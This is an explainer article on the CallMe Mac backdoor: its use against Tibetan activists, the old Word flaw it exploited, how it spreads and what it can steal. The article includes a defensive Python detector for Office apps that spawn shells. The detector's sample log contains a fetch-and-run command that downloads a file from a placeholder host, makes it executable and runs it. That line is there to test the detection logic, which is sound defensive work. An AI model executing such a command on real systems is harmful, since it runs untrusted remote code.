CallMe

The CallMe application is a backdoor Trojan that targets Mac computers only. Malware researchers first spotted the CallMe Trojan in 2013. It has not been very active in the years since, which may mean that its creators abandoned the project. The CallMe backdoor is not an overly complex threat: it can run shell commands on the infected machine and steal the victim's contacts list. At first glance, stealing contacts may seem like a minor feature, but the CallMe Trojan was employed in an attack targeting Tibetan activists. Once CallMe had compromised an activist's system, it could collect the names and details of the people in their contacts list and thus reveal further individuals linked to the movement. This helped the attackers identify more activists.

To compromise the targeted systems, the attackers relied on a known vulnerability, CVE-2009-0563, a flaw in the way Microsoft Word parses documents. A booby-trapped Word file exploiting this flaw is how the CallMe malware got its files onto the hosts. The vulnerability affects old versions of Microsoft Office, including Office for Mac, and was patched back in 2009, so a fully updated system would not have been exposed.

Infection Vectors

Besides email distribution, the CallMe Trojan may reach a Mac through two additional channels. Security researchers have spotted CallMe bundled in freeware installer packages. While most free packages are free of malware, that is not always the case: now and then you will come across one that carries an unwanted or malicious app, and you may not spot it right away. Scanning every downloaded installer before running it is therefore good practice on every computer, regardless of its OS. Malware-laden websites may provide fertile ground for CallMe infections too; the Internet holds plenty of potentially dangerous sites, which is why browsing-related incidents are no longer rare.

Still, CallMe is most likely to arrive as part of a spam email campaign. In that case, it comes disguised as a formal document, such as a commercial invoice, a bank statement, a purchase order, or a plane ticket. Opening the document triggers the exploit, which drops the real malware onto the targeted system. The payload contains a backdoor as well as an information-stealing module.
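The infection chain above (a document opened in Word that ends up running a script which drops a payload) leaves a recognisable trace in process telemetry: an Office application as the parent of a shell or interpreter. The detector below is an added example, not code from the original page or from any CallMe analysis; the JSON-lines log format and the sample events are constructed for illustration, and the hostname `example.invalid` and the file `/tmp/.update` are placeholders, not CallMe indicators.

```python
"""Flag Office processes that spawn shells or scripting interpreters.

Added example (not code from the original page): a small process-tree
detector for the maldoc infection chain described above. The log format
and the sample events are constructed for illustration; nothing here is a
real CallMe artefact.
"""
import json

# Parent images that should not normally spawn an interpreter on a Mac.
OFFICE_PARENTS = {"Microsoft Word", "Microsoft Excel", "Microsoft PowerPoint"}

# Child images that indicate script or downloader execution.
SCRIPT_CHILDREN = {"sh", "bash", "zsh", "osascript", "python", "perl", "curl"}

# Constructed process-event log (one JSON object per line), not real telemetry.
SAMPLE_LOG = """\
{"ts":"2020-05-04T10:01:02Z","pid":501,"ppid":1,"parent":"launchd","image":"Microsoft Word","cmd":"/Applications/Microsoft Word.app/Contents/MacOS/Microsoft Word"}
{"ts":"2020-05-04T10:01:09Z","pid":517,"ppid":501,"parent":"Microsoft Word","image":"sh","cmd":"/bin/sh -c curl -o /tmp/.update http://example.invalid/u; chmod +x /tmp/.update; /tmp/.update"}
{"ts":"2020-05-04T10:01:10Z","pid":518,"ppid":517,"parent":"sh","image":"curl","cmd":"curl -o /tmp/.update http://example.invalid/u"}
{"ts":"2020-05-04T10:02:00Z","pid":530,"ppid":1,"parent":"launchd","image":"Terminal","cmd":"/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal"}
{"ts":"2020-05-04T10:02:05Z","pid":531,"ppid":530,"parent":"Terminal","image":"zsh","cmd":"/bin/zsh -l"}
"""


def parse_events(text):
    """Parse JSON-lines process events, skipping blank or malformed lines."""
    events = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            events.append(json.loads(line))
        except json.JSONDecodeError:
            continue
    return events


def find_office_spawns(events, max_depth=3):
    """Return events whose ancestry (up to max_depth levels) leads back to
    an Office application and whose image is a script interpreter.

    Walking more than one level matters: a shell launched by Word that in
    turn runs curl is attributed to the document, not just to the shell,
    which is the document -> script -> dropped payload chain in the text.
    """
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for e in events:
        if e["image"] not in SCRIPT_CHILDREN:
            continue
        parent = by_pid.get(e["ppid"])
        ancestor, depth = parent, 0
        while ancestor is not None and depth < max_depth:
            if ancestor["image"] in OFFICE_PARENTS:
                hits.append({
                    "pid": e["pid"],
                    "via": parent["image"],
                    "root": ancestor["image"],
                    "cmd": e["cmd"],
                })
                break
            ancestor = by_pid.get(ancestor["ppid"])
            depth += 1
    return hits


def detect_sample():
    """Run the detector over the constructed sample log."""
    return find_office_spawns(parse_events(SAMPLE_LOG))


if __name__ == "__main__":
    for hit in detect_sample():
        print(f"pid {hit['pid']} ({hit['via']} -> rooted at {hit['root']}): {hit['cmd']}")
```

On the sample data, the `sh` spawned by Word and the `curl` it launches are both flagged, while the `zsh` a user started from Terminal is not. In a real deployment the events would come from an EDR agent or the macOS Endpoint Security framework rather than a string; the parent-image logic is the part that carries over.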

Potential Damage

Once running, the CallMe Trojan can perform a range of activities while remaining mostly unnoticed. Besides collecting system data (macOS version, hardware details, network credentials, and so on), the malware could potentially manage running processes and apps, access the microphone, the webcam, and personal files. Once CallMe can read your data, it is only a matter of time before that data is sent through the backdoor to a remote server. The harm does not end there: the backdoor can serve as a gateway for additional malicious modules delivered at the attackers' discretion. That is why a robust anti-malware tool with real-time protection remains a must.

The CallMe malware may not be the most impressive backdoor Trojan out there, but it has probably served its purpose successfully, and its creators could repackage it and weaponize it further in the future. Some Mac users still believe that their systems are impenetrable to cybercriminals, a talking point that has circulated the Web for many years. This has proven to be not only incorrect but also a dangerous notion that lulls users into a false sense of security and puts them at risk. Keep all your software up to date, since the attack described here relied on a vulnerability that had been patched years earlier; neglecting updates leaves your system and data exposed. Do not download software from unknown sources or shady websites, and make sure you install a legitimate anti-virus tool compatible with your version of macOS.
